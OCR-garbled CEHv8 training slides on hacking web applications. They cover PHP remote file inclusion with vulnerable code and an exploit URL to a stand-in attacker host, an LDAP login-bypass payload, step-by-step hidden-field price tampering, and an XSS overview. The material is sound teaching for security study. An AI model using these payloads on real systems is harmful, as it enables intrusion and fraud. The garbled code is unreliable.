r e q u i r e ( $ d r in k . ' .p h p ’ ) ;
?>
©
$ d r in k
r e q u i r e ( J
.....:‫ך‬
G O
<form m eth od = " get">
< s e l e c t name="DRINK">
< o p tio n v a lu e = " p e p si" > p e p si< /o p tio n >
< o p tio n v a lu e= " cok e ‫יי‬>coke< / o p t i on>
< / s e le c t >
C input ty p e ="su b m it">
</form >
C lient code running in a b row ser
h t t p : // w w w .j u g g y b o y .c o m /o r d e r s .p h p ? D R I N K = h t t p : / / j a s o n e v a l . c o m / e x p l o i t ? <
File injection attacks enable attackers to e xp lo it
vulnerable scripts on the server to use a rem ote file
instead o f a presum ably trusted file fro m the local
file system
Attacker injects a
rem otely hosted file at
w w w .jasoneval.com
containing an exploit
e
A ttacker
F i l e I n j e c t i o n A t t a c k
Users are allow ed to upload various files on the server through various applications
and those files can be accessed through the Internet from anyw here in the w orld. If the
application ends w ith a php extension and if any user requests it, then the application
interprets it as a php script and executes it. This allows an attacker to perform a rb itra ry
com m ands. File injection attacks enable attackers to exploit vulnerable scripts on the server to
use a rem ote file instead o f a presum ably trusted file from the local file system. Consider the
follow ing client code running in a brow ser:
< form m e th o d = "g e t">
< s e le c t name="DRINK">
C o p tio n v a lu e = " p e p s i"> p e p s i< /o p tio n >
C o p tio n v a lu e = "c o k e "> c o k e < /o p tio n >
< /s e le c t>
< in p u t ty p e = "s u b m it">
< / forra>
V ulnerable PHP code
<?php
$ d rin k = 'c o k e ';
Module 13 Page 1773

i f ( is s e t ( $_G E T ['D R IN K '] ) )
$ d rin k = $_GET[ 'DRINK' ] ;
r e q u ir e ( $ d rin k . ' .p h p ' ) ;
?>
To exploit the vulnerable php code, the attacker injects a rem otely hosted file at
w w w .jasoneval.com containing an exploit.
E xploit code
http ://w w w .iuggvboy.com/orders. php?DRINK=http://iasoneval.com /exploit?
Module 13 Page 1774

W h a t I s L D A P I n j e c t i o n ? C E H
I (•rtifwtf itfciul ■UtlM
An LDAP in je c tio n te c h n iq u e is used to ta k e a d va n ta g e o f n o n -v a lid a te d w e b
a p p lic a tio n in p u t v u ln e ra b ilitie s to pass LDAP filte rs used fo r se a rch in g D ire c to ry
Services to o b ta in d ire c t access to d a ta b a se s b e h in d an LDAP tre e
Filter
Syntax
O perator
( a tt r ib u t e N a m e o p e r a t o r v a lu e )
Example
= (a b je c tc la s s = u s e r)
> = (mdbStorageQuota>=l00000)
< = (mdbStorageQuota<=l00000)
~ = (d i sp 1ayName~=Foecke1e r )
* (displayName—* Jo h n *)
AND (&)
OR (|)
(&(o b je c tc la s s -u s e r) (displayNam e—John)
(|(o b je c tc la s s = u s e r) (displayName=John)
N O T(!) ( fo b je ctC la ss= g ro u p )
LDAP D irectory Services
store and organize
inform ation based on its
attributes. The inform ation
is hierarchically organized
as a tree o f directory
entries
LDAP is based on the
dient-server model and
clients can search the
directory entries using
filte rs
(*■
a.
WJ
Q
J
V)•pH
(0
A
*
C o p yrig h t © by E&Coinal.A ll R ights R eserved. R ep ro d u ctio n is S trictly Pro h ibited .
W h a t i s L D A P I n j e c t i o n ?
An LDAP (Lightw eight D irectory Access Protocol) injection attack works in the same
way as a SQL injection attack. All the inputs to the LDAP m ust be properly filtered, otherw ise
vulnerabilities in LDAP allow executing unauthorized queries or m o d ifica tio n o f the contents.
LDAP attacks e xp lo it web-based applications constructed based on LDAP statem ents by using a
local proxy. LDAP statem ents are m odified when certain applications fail. These services store
and organize inform ation based on its attributes. The inform ation is hierarchically organized as
a tree o f directory entries. It is based on the client-server m odel and clients can search the
directory entries using filters.
Module 13 Page 1775

( a t t r i b u t e N a m e o p e r a t o r v a l u e )
Example
Filter
Syntax
O perator
(d i splayN am e~=F oec k e le r )
(d i splayN am e=*Joh n *)
(S (o b je c tc la s s = u s e r )(d is p la y N a m e = J o h n )AND (&)
OR ( | ) (& (ob j e c t d s s s = u s e r ) (d±splayN am e=John)
NOT (I) ( !o b je c tC la s s = g r o u p )
FIGURE 1 3 .1 0 : LDAP In je c tio n
Module 13 Page 1776

H o w L D A P I n j e c t i o n W o r k s C E H
n
LDAP
LDAP Server
Normal Query
+ Code Injection
Normal Result and/or
Additional Information
LDAP
Normal Query
Normal Result
ClientLDAP ServerClient
LDAP injection attacks are sim ilar to SQL injection attacks b ut e x p lo it user param eters to generate LDAP query
To test if an application is vulnerable to LDAP code injection, send a query to the server m eaning th a t generates
an invalid input. Ifth e LDAP server re tu rns an e rro r, it can be exploited w ith code injection techniques
If an attacker enters valid user name "juggyboy",
and injects juggyboy)(&)) then the URL string
becomes (&(USER=juggyboy)(&))(PASS=blah)) only
the first filter is processed by the LDAP server, only
the query (&(USER=juggyboy)(&)) is processed.
This query is always true, and the attacker logs into
the system without a valid password
Account Login
| 1‫״‬ v ! Username juggyboy)(&))
1Vv. : Password blah
S u b m itA ttacker
Copyright © by E&Coinal.All Rights Reserved. Reproduction is Strictly Prohibited.
H o w L D A P I n j e c t i o n W o r k s
( H U LDAP injection attacks are com m only used on w eb applications. LDAP is applied to any
o f the applications th a t have some kind of user inputs used to generate the LDAP queries. To
test if an application is vulnerable to LDAP code injection, send a query to the server th a t
generates an invalid input. If the LDAP server returns an error, it can be exploited w ith code
injection techniques.
Depending upon the im plem entation of the target, one can try to achieve:
© Login Bypass
© Inform ation Disclosure
e Privilege Escalation
© Inform ation A lteration
Module 13 Page 1777

N orm al Q uery
N orm al Result
LDAP Server
Normal operation
*•‫י־‬
Client
FIGURE 1 3 .1 1 : N o rm a l o p e ra tio n
Operation with code injection
<
Client
FIGURE 1 3 .1 2 : O p e ra tio n w ith co d e in je c tio n
Attack
If an attacker enters a valid user name o f "ju g g y b o y " and injects ju g g yb o y) (&)), then the URL
string becomes (& (user=ju g g yb o y) (&)) (P A S S =blah)). Only the first filte r is processed by the
LDAP server; only the query (& (USER=ju g g yb o y) (&)) is processed. This query is always true,
and the attacker logs into the system w ith o u t a valid password.
‫ץ‬
□ c LDAP
N orm al Q uery
+ Code Injection
N orm al Result a n d /o r
A dditional Info rm ation
LDAP Server
A ccount Login
U sern a m e juggyboy)(&))
: P assw ord blah
A tta c k e r
FIGURE 1 3 .1 3 : A tta c k
Module 13 Page 1778

H i d d e n F i e l d M a n i p u l a t i o n A t t a c k I C E H
A ttack Request
h t t p : / /w w w . ju g g y b o
y . c o m /p a g e . a s p x ? p r
o d u o t= J u g g y b o y % 2 0 S
h i r t & p r i c e = 2 . 00
N orm al Request
h t t p : / / w w w . ju g g y b o
o d u c t= J u g g y b o y % 2 O S
h i r t & p r ic e = 2 0 0 .0 0
HTML Code
< fo m method="post"
action^ " page.asp x" >
<in p u t type="hidden" name=
"PRICE" val ue200 . 0 0 " ‫־‬ ">
Product name: < inp u t type=
" te x t‫״‬ name="product"
v a lu e="Juggyboy S h ir t "X br>
Product p r ic e : 2 0 0 .00" X b r>
< inp u t type=" submit" valu e=
"submit" >
</form >
$ When a user makes selections on an HTML page, the selection is typically stored as form
field values and sent to the application as an HTTP request (GET or POST)
0 HTML can also store field values as hidden fields, which are not rendered to the screen by
th e browser, but are collected and subm itted as parameters during form submissions
6 Attackers can examine th e HTML code o f the page and change the hidden field values in
order to change post requests to server
Product Name Jugg yboy S h irt ^
[ 200 )Product Price
Submit
H i d d e n F i e l d M a n i p u l a t i o n A t t a c k
Hidden m anipulation attacks are m ostly used against e‫־‬com m erce websites today.
M any online stores face these problem s. In every client session, developers use hidden fields to
store client inform ation, including price o f the product (Including discount rates). At the tim e of
developm ent o f these such program s, developers feel th a t all the applications developed by
them are safe, but a hacker can m anipulate the prices o f the product and com plete a
transaction w ith price th a t he or she has altered, rather than the actual price o f the product.
For exam ple: On eBay, a particular m obile phone is fo r sale fo r $1000 and the hacker, by
altering the price, gets it fo r only $10.
This is a huge loss fo r w ebsite owners. To protect th e ir netw orks from attacks, w ebsite owners
are using the latest antivirus softw are, firew alls, intrusion detection systems, etc. If th e ir
w ebsite is attacked, often it also loses its credibility in the m arket.
W hen any target requests w eb services and makes choices on the HTML page, then the choices
are saved as form field values and delivered to the requested application as an HTTP request
(GET or POST). The HTML pages generally save field values as hidden fields and they are not
displayed on the m o n ito r o f the target but saved and placed in the form o f strings or
param eters at the tim e o f form subm ission. Attackers can exam ine the HTML code o f the page
and change the hidden field values in order to change post requests to the server.
< in p u t ty p e = ‫״‬ h id d e n " name= "PRICE" v a lu e = "2 0 0 . 00‫״‬ >
Module 13 Page 1779

P ro d u c t name: < in p u t typ e = " t e x t " n a m e = "p ro d u ct" va lu e = "Ju g g yb o y
S h ir t " x b r >
P ro d u c t p r ic e : 2 0 0 . 00"><br>
< in p u t ty p e = "s u b m it" v a lu e = 1's u b m it">
< /fo rm >
1. Open the htm l page w ith in an HTML editor.
2. Locate the hidden field (e.g., "<type=hidden nam e=price value=200.00>").
3. M odify its content to a d iffe re n t value (e.g. "<type=hidden nam e=price value=2.00>").
4. Save the htm l file locally and browse it.
5. Click the Buy button to perform electronic shoplifting via hidden m anipulation.
A tta c k R e q u e st
h t t p : / / w w w . ju g g y b o
o d u c t= J u g g y b o y % 2 0 S
h i r t & p r i c e = 2 . 0 0
FIGURE 1 3 .1 4 : H id d e n F ie ld M a n ip u la tio n A tta c k
N o rm a l R e q u e st
HTM L Code
H id d e n F ie ld
P rice = 2 0 0 .0 0
h t t p : / /w w w . ju g g y b o
o d u c t= J u g g y b o y %2OS
h i r t f i p r i c e = 2 0 0 .0 0
1 ! "
<form m ethod="post"
;»nt‫־‬.‫־‬i n n s "p a g « .a«spx">
< in p u t typ e= " 11idden" name=
"PRICE" v a lu e = " 2 0 0 .00" >
P rod u ct nam e: < in p u t typ e=
" tex t" nam e="product"
valu e= " Ju ggyb oy S h ir t" X b r >
P rod u ct p r ic e : 200.00" > < b r>
< in p u t typ e=" sub m it" v a lu e =
"subn'.it,,>
< /fo r :‫>״‬
Module 13 Page 1780

C ross-site s c rip tin g (,XSS' or'C SS') a tta cks e x p lo it v u ln e ra b ilitie s in d y n a m ic a lly g e n e ra te d w e b pages,
w hich ena b les m a licio u s a ttackers to in je c t c lie n t-s id e sc rip t in to w eb pages vie w e d by o th e r users
It occurs w h e n in v a lid a te d in p u t d a ta is in clu d e d in d yn a m ic c o n te n t th a t is se n t to a user's w e b b ro w se r
fo r re n d e rin g
A ttacke rs in je c t m a licio u s JavaS cript, VBScript, A ctiveX , HTML, o r Flash fo r exe cu tio n on a v ic tim 's system by
h id in g it w ith in le g itim a te re qu e sts
Session hijacking
Brute force password cracking
Data theft
Intranet probing
Keylogging and rem ote monitoring
Malicious script execution^‫ם‬
Redirecting to a malicious server^
^I IExploitinguserprivileges
1'Ads in hidden !FRAMES and pop-ups^‫׳‬ ^
^Datamanipulation
C o p yrig h t © by E&C01nal.A ll R ights R eserved. R ep ro d u ctio n is S trictly Proh ibited
C r o s s - S i t e S c r i p t i n g ( X S S ) A t t a c k s
Cross-site scripting is also called XSS. V ulnerabilities occur when an attacker uses web
applications and sends malicious code in JavaScript to d iffe re n t end users. It occurs w hen
invalidated input data is included in dynam ic co n te n t th a t is sent to a user's w eb brow ser fo r
rendering. W hen a w eb application uses input from a user, an attacker can com m ence an
attack using th a t input, which can propagate to oth e r users as w ell. Attackers inject m alicious
JavaScript, VBScript, ActiveX, HTML, or Flash fo r execution on a victim 's system by hiding it
w ith in legitim ate requests. The end user may tru st the w eb application, and the attacker can
exploit th a t tru st in order to do things th a t w ould not be allow ed under norm al conditions. An
attacker often uses d iffe re n t m ethods to encode the m alicious portion (Unicode) o f the tag, so
th a t a request seems genuine to the user. Some o f them are:
© M alicious script execution - Session hijacking
© Brute force password cracking - Redirecting to a m alicious server
Q Exploiting user privileges - Data th e ft
Q Intranet probing - Ads in hidden !FRAMES and pop-ups
© Data m anipulation - Keylogging and rem ote m onitoring
Module 13 Page 1781

Hacking web applications CEHv8 module 13

Hacking web applications CEHv8 module 13

Recommended

Recommended

More Related Content

What's hot

What's hot (20)

Viewers also liked

Viewers also liked (20)

Similar to Hacking web applications CEHv8 module 13

Similar to Hacking web applications CEHv8 module 13 (20)

Recently uploaded

Recently uploaded (20)

Hacking web applications CEHv8 module 13